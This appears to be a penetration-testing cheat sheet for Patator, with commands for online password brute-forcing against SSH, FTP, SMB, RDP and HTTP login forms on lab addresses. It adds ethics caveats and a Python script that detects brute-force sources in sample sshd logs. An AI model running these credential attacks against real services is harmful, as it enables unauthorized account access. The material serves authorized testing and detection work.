Patator Cheat Sheet
Multi-purpose brute-forcer with flexible modules and conditions.
Overview
Patator is a Python framework for scripted login attacks (SSH, FTP, HTTP, SMB, SQL, etc.) with rich condition matching and rate control. It is an online tool (it works against live services) and is highly configurable. Ethics: only against targets and credentials in scope; unauthorized access attempts violate law and policy. Use delays and small lists in shared labs.
Install
sudo apt install patator
patator --help

Essential commands
patator ssh_login host=10.10.10.5 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed'
patator ftp_login host=10.10.10.10 user=FILE0 password=FILE1 0=users.txt 1=pass.txt
patator http_fuzz url=http://10.10.10.20/login method=POST body='user=admin&pass=FILE0' 0=pass.txt -x ignore:code=200

Common workflows
SSH with user list:
patator ssh_login host=10.10.10.5 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt -x ignore:mesg='Permission denied' -t 4

SMB:
patator smb_login host=10.10.10.5 user=FILE0 password=FILE1 0=users.txt 1=pass.txt domain=LAB -x ignore:code=0xC000006D

HTTP POST (form):
patator http_fuzz url=http://10.10.10.20/index.php method=POST body='username=admin&password=FILE0' 0=pass.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid credentials'

RDP:
patator rdp_login host=10.10.10.10 user=administrator password=FILE0 0=pass.txt

Save hits:
patator ssh_login host=TARGET user=root password=FILE0 0=pass.txt -l /tmp/patator_ssh.log

Flags reference
| Flag | Meaning |
|---|---|
| FILE0 | Wordlist slot 0 |
| -x ignore: | Skip on condition |
| -x quit: | Stop on success |
| -t | Threads |
| --rate-limit | Delay between tries |
| -l | Log file |
| host= | Target |

Tips
- Ethics: set --rate-limit and low -t on production-like targets; document start/stop times for the client.
- Read module help: patator ssh_login --help.
- Use fgrep/egrep/code conditions from a manual failed login before automating.
- Patator shines when Hydra/Medusa modules lack options (custom headers, cookies, encodings).
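
From the defender's side, the SSH workflows above appear in sshd logs as repeated failures from one source. The following is an added example, not part of the original cheat sheet and not Patator code, that flags such sources over constructed auth.log lines. The OpenSSH "Failed password" line format, the function names and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in OpenSSH auth.log style (not real traffic).
SAMPLE_LOG = """\
Mar  3 10:00:01 lab sshd[811]: Failed password for root from 10.10.10.99 port 40112 ssh2
Mar  3 10:00:02 lab sshd[812]: Failed password for root from 10.10.10.99 port 40114 ssh2
Mar  3 10:00:02 lab sshd[813]: Failed password for invalid user admin from 10.10.10.99 port 40116 ssh2
Mar  3 10:00:03 lab sshd[814]: Failed password for root from 10.10.10.99 port 40118 ssh2
Mar  3 10:00:04 lab sshd[815]: Failed password for invalid user admin from 10.10.10.99 port 40120 ssh2
Mar  3 10:05:10 lab sshd[820]: Failed password for alice from 10.10.10.7 port 51544 ssh2
Mar  3 10:09:40 lab sshd[821]: Accepted password for alice from 10.10.10.7 port 51560 ssh2
Mar  3 10:30:00 lab sshd[830]: Failed password for alice from 10.10.10.7 port 51800 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_failures(text, year=2024):
    """Yield (timestamp, ip, user) per failed-password line; syslog omits the year, so it is assumed."""
    for line in text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"]

def flag_sources(text, max_failures=5, window=timedelta(seconds=60)):
    """Return {ip: usernames tried} for sources with >= max_failures failures inside one window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> every username that source has tried
    flagged = {}
    for ts, ip, user in parse_failures(text):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while ts - q[0] > window:  # drop failures that have aged out of the window
            q.popleft()
        if len(q) >= max_failures:
            flagged[ip] = sorted(users[ip])
    return flagged

if __name__ == "__main__":
    print(flag_sources(SAMPLE_LOG))
```

Attempts run with a low -t and a --rate-limit delay are spread over time, so a short window alone misses them; run a second pass with a longer window alongside it.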